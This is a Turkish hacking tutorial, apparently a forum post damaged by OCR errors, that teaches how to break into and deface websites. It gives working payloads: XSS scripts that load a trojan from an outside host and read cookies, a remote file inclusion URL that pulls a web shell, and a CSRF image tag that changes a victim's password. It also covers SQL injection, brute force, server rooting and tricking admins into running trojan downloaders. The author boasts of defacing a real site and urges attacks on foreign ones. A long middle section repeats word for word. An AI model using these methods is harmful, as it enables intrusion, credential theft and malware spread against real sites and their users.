İlk Olarak Sunu Belirheyim; Programla Hack Olmaz, Hele Hedef Site Had: Hiç Olmaz...
Ben Bunu Acunetiııle yada Bilmemne Tarayıcsıyla Taradım,Sunu Buldu Bunu Buldu Aha Hackleyecem
Diye Bir Şey Yoktur. Bu Şekilde Hack Yapamazsınız !!
Şimdi Diyorsunuz Ü içinizden : Eee Bu Adam Ne Diyor Böyle Nasıl Tarıycaz, Bu Programlar Olmadan
Program olmadan Nasıl hack yapıcaz?
- Manuel Yani Elle Tarıycaı.. En İyi Taaama Yöntıemi Budur. Hatta Tek İyi Tarama Yöntemi...
Doğru Yapıldığı Takdirde Hacklemeniz Garantidir...Doğu Uygılandığı Takdirde Dahi Küçük Bir İhtimal
Açık Bulamama ihtimalini: De 0labiIir...Burıu Da Diğer Şekîlerde Aşıcaz...
En Azından Programbnn Siıe Verdiği Gelekfiz ve Saçma Log Dosyalanndan Kurtulmuş Olacağız...
Oncelikle Hedef Sitenizi Tanımaınıı Gerekiyor...
Sitemiz Hangi Dilde Yazılmış?
Php,html,asp
Özel Bir Scripti Var Mı ?
vbulletin,mybb,smf
Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler Yahut Diğer Scriptler.
Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden
Bulunmuş Açık Var Mı Ona Bakalım
Bunu Öğenmek İçin Su Sitelerde Script Adını Aratını
* 1337day.com (Yeni Milw0rm)
* exploit-db.com
En Ünlü ve İlgi Gören Exploit Siteleri Buralardır...BunIann Dışında Başka Sitelerde De Aratabilirsiniz
Siı.Ama Öncelikli Tercih 1337 .Arattık ve Açık Bulduk Diyelim...
Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ? Otump Bekleyecek Halimiz Yok Tabii ki...
- Exploitirnizi Kullanıp Admin Paneline Dalıyoruz....
- Shell Upload Ediyoruz
- İndeximizi Çakıyofuı...
Shell Upload Olmuyor Mu ?
- I-lacklediğimiz Bir Siteye Yönlendirerek İndn Orada Görûnmsini Sağlanı... Nasıl Mı?Aşfiıdaki
Kodu Ana Sayfadaki Bir Dökıûmana l-lefhangi Ekleyerek..
<meta http-equiv='refresh" content="5;URL=http://www.yonleneceksite.com'>
5 Sayısını Aıaltıp Arl:ırabilirsiniz...Bu Saniye Ayarıdır...
Ayriyeten Sunu Da Ekleyim...Metayı Bazı Sitelerde Admin Panele Dalmadan Da ükabílirsiniz...
Aşağılarda Bunu Da Göreceksiniz...
- Eğer Meta Da Yemiyorsa Sitede Konu Açıp Öyle Dökeceksiniı içinizi :l
Farz Edelim Ki Bu Scriptte Açık Yok Yada Kamusal Bir Script DeğiI,Kişisel Oluşturulmuş Bir Script...
Bu Sefer Artık Manuel Aramaya Geldik...
Arayacağımız Muhtemel Açıklar ;
Upload Bugs
Html Injection Bugs
Bunlar Dışında ;
Bıgs ve Admin Zekasına Yönelik Açıklar:) [Yani SM Çekicez]
Çokça Kullanılabilen Scriptlerdeki Güncel Açıklarıda Da Tırıyacağız...
Sonra XSS Açıklarını Tarayalım
Sql Bug Olması İçin Önoefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;
.php?id=
.asp?id=
.aspx?id=
Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını
Anlamak için ID Değerinin Sonuna " (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa
Muhtemel Sql Açı Vardır...
Bu Takdirde Siteye Manuel Yada Havíj/Benıeri Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada I-laııije Atabílirsiniı.Bu Şekilde Panele Dalarıı...
Panelde Ne Mi Yapıcaz ?
Biraz Yukarıda Anlatmıştln 
Olayı Tekrar Okuyalım Hatırlamıyorsak...
Olayı Tekrar Okuyalım Hatırlamıyorsak...Sonra Xss Açıklarını Tarıyalım
Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodları nı Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...
- O Güzel Javasaipt Kodumuz Bu ;
<script>alert('co3rr')</script>
Nasıl yedireceğimize gelince:
ID Değerlerinin Sonuna Ekleüp Enterlıyabiliriz Yada Search.php?q= Böyle Bir Değerin Sonuna Ekleyerek
Enterlıyabiliriz...
Bunu Char vb Algoritrııalarla Şifreleyerek De Girebifiriz...Bu Şekilde Filtrelerneyi De Aşmış Oluruz...
- Yani Bu Şekilde ;
<script>alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script>
- Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz...
<script scr=http://cod3rr.tk/trojen.js></script>
- Bu Şekilde De Yazılıma Ait Çerez Bilgisi ni Kutucuğa Yansıtabiliriz...
<script>alert(document.cookie);</script>
Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kirnlîk doğrulamayı sağlayan
zayıf bileşenleridir. Saãdıgan eğer sayfayı ziyaret eden kullanıcılann Çerez bilgisini okuyup kaydedebilirse
kendi bilgileri İle yerlerini değişlirerek kurbanın yetkilerine Ulaşabilir.Çerez Bägisi Çalma Konusu
Sitemizde Mevcuttur.Aıama Nlolıorunda 10 Saniyelik Bir İşlernle Gerekfi Oldulnça Geniş Anlatımlara
Ulaşabilirsiniz...Burada Konuyu Açhkça Açanz..Boşuna Daha Fazla Uzatmayalim Zaten Hedef Site
Hack Temel Anlatım Bile Çok Uzun..
Sizi De Sıkmamamız Gerekir Değil Mi ?
Remote File lnclusion (RFI) Açıklarını Tarayalım
Günümüzde Neredeyse Hiç Rastlayarnadığımız Rfi Açıkları, Artık Ölü Bir Açık Haline Gelmiştir..
Nadir Olsa Da Bazı Sitelerde Rastlayabiliyoruz...ID Değerleri Yada include.php Türü Bir Dosya Lazım Bize.
Uzaktan Dosya Dahil Edeoeğiz Serverımıza Bu Şekilde..Mesela Bir Shell Kodu Olabilir Bu 
Peki Nasıl Mi Yapıyoruz ?
http://hedefsite.com/include.php=http://cod3rr.tk/r57shelI.txt?
- 7 Mutlaka Bulunmalıdır...
Açık Varsa Shell Karşımıza Çıkacaktır.. Biz De İndmi Basar ve Çıkarız...
Local File lnclusion (LFI) Açıklarını Tarayalım
LFI Da Artık Kaışırn Az Çıkmaya Başlayan Bir Açıktır ...Pek Etkili Bir Açık Değldir Aslında Ama
Uğmnda Hedef Site Had: Varsa Denemeye Değer .
Bu Açık Sayesinde Serverdaki Bir Dosyayı Okuyabilirsiniı..
Mesela configurat'ıon.php 'yi Okursanız Database Şifresi, Ftp Şifresi Gibi Kritik Bilgilere
Ulaşıp Baglantıyı Kurup İndeııinizi Basabilirsiniz...
Cross Site Reference Forgery (CSRF - XSRF) Açıklarını
Cross Site Request Forgery (Diğer Adlanyla Xsrf, Csrf, Ve ûoss Site Reference Forgery) Browserlenn
Javascript Çalıştırma Deslseğiyle Kişilere İslıenilenin Dışında Servera Komut Yollanmasını Saglayan
Kodlardır. Sitemiz Veya Sistemimiz Bu Komutlar İçin Genel Olarak Url'Ierden Yararlanır.
Bu Açıklara
Çok Sık Rastlarıı.En Büyük Sistemlerde Dahi...Gmailde Vardı Hatta Bir Ara Ama Tabi Şu An Fıxlendi
Bug'ımız...
Mesela;
https//www.hedefsite.com/Management/Change_Password.Php?New_Pass=cod3rr
Biz de Bunu Bildiğimiz İçin Bundan Yaıarlanıcaz Veya Formlar Oluşturarak İşlemimizi Gerçekleştireoeğiz.
Zaten Amacımız da Bu İşlemleri Gerçeklqtirebilecek Yetkiye Sahip Kişileri Oturum Açmış Durumdayken
Kullanarak Onlar Yerine Kendi Kodlanmızı Güvenilir Kodlarmış Gibi Kulla nıcıyı Kullanarak Göndefmektir.
Ve Bu Saldınlan Htrnl Veya Javascript Kodlan Kullanarak İşlemesini Sağlayabiliriı.
<img Src="https://www.hedefsite.com/Management/Change_Password.Php?New_Pass=cod3rr&verify_Pass=cod3rr&submited=1">
Ömek Olarak,l.inki Tıklattığımıı User,Eğer Sitede Oturum Açmış Durumdaysa Şifresinin cod3rr
Olmasını Sağladık .Arlık Kim Tutar Bizi 2:)
Upload Açıklarını Tarayalım
Upload Açıklarının Yollannı Bulmak Zordur Fakat Rastlamak O Kadar Da Zor Değildir Günümüzde...
Yani Demek İstıecfiğim Su, Siz Upload Aıçığını Ararsanız Çok Zor Bulursunuz, Ancak 0 Sizi Tesadüfen Bulur
Genelde _
Muhtemel Upload Açıklı Dosya Yollan ;
upload.php
uploadimg.php
uploader.php
Bu ve Bu Gibi Yollara Başvurarak Shell Upload Etmeyi Deneyehilirsiniz..
Html İnjection Açıklarını Arayalım
Sitelerde Yorum Ekleme Yeri Varsa Buralarda Muhtemel Html İnjection Açıklannı Deneyebilirsiniz...
Ara Sıra Karşımıza ÇıkmaIctadır...Denemel:l:e Fayda Var...
Mesela Bu Da Bi pkk Sitesi ve Html lnj Yöntemiyle İndex Basmıştım Buna _
- http://welati.net/nuce.php?ziman=ar&icI=3773&niviskar=-1&c:ure=2&kijan=
Meta Kodunu Yorum Başlığı Kısmına Yapıştırıp Yðnlendirebílirsin...
<meta http-equiv="refresh" content="5;URL=http;//www.yonleneceksite.com'>
İsi Garantiye Alıyım Diyorsanız Tüm Sahrlaıa Meta Kodunu Yapıştırabilirsiniz...
Joomla ve Wordpress Açıklarını Tarayalım
Arkadaşlar Hedef Site Hack Konusunda Günümüzde En Önemli Hususlardan Biridir...Çünkü Bu
Scriptlerden Tahmin Edemeyeceğiniz Kadar Kullanan Site Vardır.Devlet Siteleri Dahil..Düşünûn Artık.1337 ve exploit-db 'den Bu Scriptlere Ait Güncel Açıklan Bulabilirsiniı...Basma İhtimaliniı Büyük Oranda Artar...Bu Scripftlerin En Büyük Açığı Ola Brute Foroe Açığı Hala En Çok Kullanılan Sürûmlerinde Sabittir..Emin Olun IG Bnıise Force Yörıtıeminde Sağlam Bir Wordlist Kullanırsanız Basmanız %90 GarantidirDiyebiliriz...Brute Force Yðntemlnl Reverse IP l.ookup'tan Çıkın Siteler Ûzerlnde Mutlaka Uygulıyın O Da Ne ? Seslerinizi Duyar Gibiyim... Aşayı Okuyun Hadi 0 Zaman
Simdl Diyelim KI Hlçblr Şekilde Açık Bulımıdık...Server Tarımı Dlye Blr Olııy Vıırdır...
Bu Olay Sayesinde Açık Bulundurmayan Siteleri De Hedef Sitemizle Aynı Sunucuda Bulunan AçıldıSiteler Aracılığıyla Hackleyebiliriz...Bu Siteleri 'Reverse IP Lookup" İle Öğrenebiliriz...En Sağlam
Reverse IP Yapan Adres Burasıdır.Sadece Ksin Sorıuçlan Verir;
http://www.yougetsignaI.com/tools/web-sites~on-web-server/
Burada Tarıyomı Başında http:// ve Sonunda / ve dosya uzantilan olmadan...Burası Önemli.Aksl
Tı Iıdlrde Tıramız...
Diyelim IG 50 Site Qklı...Bu Sitelerde Yukardaki Açıkları ve Aşağıda Bahsedeceğim Açıkları
Tarayacağız...Tut Ki Bir Sitede Açık Yakaladık ve Shell Attık...Arl:ık %99 İndeıı Basrrıamı Ramak
Kalmış Demeklir...Server Geçişliyse Eğer,GeçişIeri Kullanıp Basa nz,Geçişh Değilse Echo Yöntemi
vb Yöntaemlerle Basmayı Deneriz...Gen olmuyor Mu?Dert Etmeyin ; Config Okur Gene Basanı Biz 2)
Config De Mi Yok ?Yada Okunmuyor Mu ?
I-liç Çekemeyiz Böyle Serverlan İşte 0 Zaman Da Serven Rooflayıp İndmizi Basarız Kaçan Yok Yani...
Hem Bizden Kurtulur Mu Hiç ?Diyelim Ki Server'a Da Giremedik.. Eee Napız Vaı Mı Geçicez? - Tablkl Hayır Dipnot : Bu Ara lar Gene ISS Açı Gündeme Geldi..ASP Sitelere Whois Çekebilirsin..Eğer ISS 6 veyaDüşûkse %90 ISS Açığı Var Demektir...Cpanel, Plak Panel Açıklan Da Olduloça İşe Ya ramaktadır...Onlara Da Göz Atın..Whn'›G Açıkları Hakkında Birkaç Tool Paylaşmıştım Forurrıda.0nIar Da Çok Çok İşine Yarayacaktır...
Upload Açıklarının Yollannı Bulmak Zordur Fakat Rastlamak O Kadar Da Zor Değildir Günümüzde...
Yani Demek İstıecfiğim Su, Siz Upload Aıçığını Ararsanız Çok Zor Bulursunuz, Ancak 0 Sizi Tesadüfen Bulur
Genelde _
Muhtemel Upload Açıklı Dosya Yollan ;
upload.php
uploadimg.php
uploader.php
Bu ve Bu Gibi Yollara Başvurarak Shell Upload Etmeyi Deneyehilirsiniz..
Html İnjection Açıklarını Arayalım
Sitelerde Yorum Ekleme Yeri Varsa Buralarda Muhtemel Html İnjection Açıklannı Deneyebilirsiniz...
Ara Sıra Karşımıza ÇıkmaIctadır...Denemel:l:e Fayda Var...
Mesela Bu Da Bi pkk Sitesi ve Html lnj Yöntemiyle İndex Basmıştım Buna _
- http://welati.net/nuce.php?ziman=ar&icI=3773&niviskar=-1&c:ure=2&kijan=
Meta Kodunu Yorum Başlığı Kısmına Yapıştırıp Yðnlendirebílirsin...
<meta http-equiv="refresh" content="5;URL=http;//www.yonleneceksite.com'>
İsi Garantiye Alıyım Diyorsanız Tüm Sahrlaıa Meta Kodunu Yapıştırabilirsiniz...
Joomla ve Wordpress Açıklarını Tarayalım
Arkadaşlar Hedef Site Hack Konusunda Günümüzde En Önemli Hususlardan Biridir...Çünkü Bu
Scriptlerden Tahmin Edemeyeceğiniz Kadar Kullanan Site Vardır.Devlet Siteleri Dahil..Düşünûn Artık.1337 ve exploit-db 'den Bu Scriptlere Ait Güncel Açıklan Bulabilirsiniı...Basma İhtimaliniı Büyük Oranda Artar...Bu Scripftlerin En Büyük Açığı Ola Brute Foroe Açığı Hala En Çok Kullanılan Sürûmlerinde Sabittir..Emin Olun IG Bnıise Force Yörıtıeminde Sağlam Bir Wordlist Kullanırsanız Basmanız %90 GarantidirDiyebiliriz...Brute Force Yðntemlnl Reverse IP l.ookup'tan Çıkın Siteler Ûzerlnde Mutlaka Uygulıyın O Da Ne ? Seslerinizi Duyar Gibiyim... Aşayı Okuyun Hadi 0 Zaman
Simdl Diyelim KI Hlçblr Şekilde Açık Bulımıdık...Server Tarımı Dlye Blr Olııy Vıırdır...
Bu Olay Sayesinde Açık Bulundurmayan Siteleri De Hedef Sitemizle Aynı Sunucuda Bulunan AçıldıSiteler Aracılığıyla Hackleyebiliriz...Bu Siteleri 'Reverse IP Lookup" İle Öğrenebiliriz...En Sağlam
Reverse IP Yapan Adres Burasıdır.Sadece Ksin Sorıuçlan Verir;
http://www.yougetsignaI.com/tools/web-sites~on-web-server/
Burada Tarıyomı Başında http:// ve Sonunda / ve dosya uzantilan olmadan...Burası Önemli.Aksl
Tı Iıdlrde Tıramız...
Diyelim IG 50 Site Qklı...Bu Sitelerde Yukardaki Açıkları ve Aşağıda Bahsedeceğim Açıkları
Tarayacağız...Tut Ki Bir Sitede Açık Yakaladık ve Shell Attık...Arl:ık %99 İndeıı Basrrıamı Ramak
Kalmış Demeklir...Server Geçişliyse Eğer,GeçişIeri Kullanıp Basa nz,Geçişh Değilse Echo Yöntemi
vb Yöntaemlerle Basmayı Deneriz...Gen olmuyor Mu?Dert Etmeyin ; Config Okur Gene Basanı Biz 2)
Config De Mi Yok ?Yada Okunmuyor Mu ?
I-liç Çekemeyiz Böyle Serverlan İşte 0 Zaman Da Serven Rooflayıp İndmizi Basarız Kaçan Yok Yani...
Hem Bizden Kurtulur Mu Hiç ?Diyelim Ki Server'a Da Giremedik.. Eee Napız Vaı Mı Geçicez? - Tablkl Hayır Dipnot : Bu Ara lar Gene ISS Açı Gündeme Geldi..ASP Sitelere Whois Çekebilirsin..Eğer ISS 6 veyaDüşûkse %90 ISS Açığı Var Demektir...Cpanel, Plak Panel Açıklan Da Olduloça İşe Ya ramaktadır...Onlara Da Göz Atın..Whn'›G Açıkları Hakkında Birkaç Tool Paylaşmıştım Forurrıda.0nIar Da Çok Çok İşine Yarayacaktır...
Sosyal Mühendislik (SM) Yöntemi İle Hack
Eğer Zekanızı Kullanırsanız Emin Olun Bu Yöntemle Hackleyemeyeceğiniz Site Yoktur.
Güvenlik Zincirinin En Zayıf Halkası İnsandır.Bir Zincirin Halkalarından Birinin Kopması, Zincirin
Parçala nmasına Yeter.
Bu Yöntemi Uygularken Elınııde FUD Bir Java Downloader Bulunmasi Sosyal Mühendislik İle Yapacağınız
Hacklerde Başan Oranınııı %40 Arlırır...
(Forumlarda Paylaşılan Downloaderlar Kısa Süre Sonra Tüm Antivirüsler Tarafindan Tanınır.Bu Da
Etki Göstermez Anlayağınız... Tavsiyem Private Olarak Satın Almanız...Çok Pahalı Değildir)
Downloader' ı Kunıp Hedef Site Adminimizi Yada Reverse lp Lookuptan Çıkan Sitelerden Gözümüze
Kestirdiğimiz Birini Kandınp Trojan Yedirebiliriz.Gerisini Biliyorsunuz Mail Şifresini Alıp Hosting
Şirketine Mail Atabilir,Şifre Yenileyip Hackleyebilirsin.0Imadı Direk Pcden Ftp Yada Admin Şifresini
Çala rsınız ve Sonuç BeIIi.Ama Antivirüslere Yakalanmayan Bir Downloaden Yemeyeoek Adam Zor
Tanınm Ben :.Hiç Yemem Diyen Uyanıklara Yedirdim Bu Yöntemle Çok Site İndirmişliğim De Vardır.
0 Da Olmadı, Phishing Denersiniz...
Sosyal Mühendisliklıe Diğer Bir Yöntem De lleveıse'den Çıkan Sitelerden Gözümüze Site Kestirir,
İletişim Bílgilerinden Ulaşıp SM Çekeısiniz...Bu Şekilde De BasabiIirsiniz..Bu Yöntemle De Bir Çok Site
Bastım..Ama SM'de En Başanlı Yöntem Downloader Yöntemidir Bence Tüm Bu Dedildeıími Uygularsanız
Eğer, Hackleyemeyeceğíníı Site Yoktur...
Unutmayın; En Güvenli Sistem, Fişi Çekili Olandır...
Anlatbğım Her Şey Hakkında Geniş Makaleler Fonımda Bulunuyor...Beni De Forumda Aratarak
Anlattıklarım Hakkında Videolara Ulaşabiliısiniı..
- Alıntı Yapıp Da ismimi Belirtmeyenlere ve Masum Türk ve Müslüman Sitelerini Hackleyenlere
Hakkım Helal Olmasın... Bunu Da Yabancı Site Varken Masum Türk Siuelerine Bulaşmayın.
Hem Kendi Başınızı Da Belaya Sokaısınız Türk Sitesi Hacklerseniz...Ama Yabancı Sitelerde Yasal Bir$orun
Falan Da Çıkmaz Adınıza, Hem De Yabancı Heykler Daha Eğlenceli
Selametle Kalın.
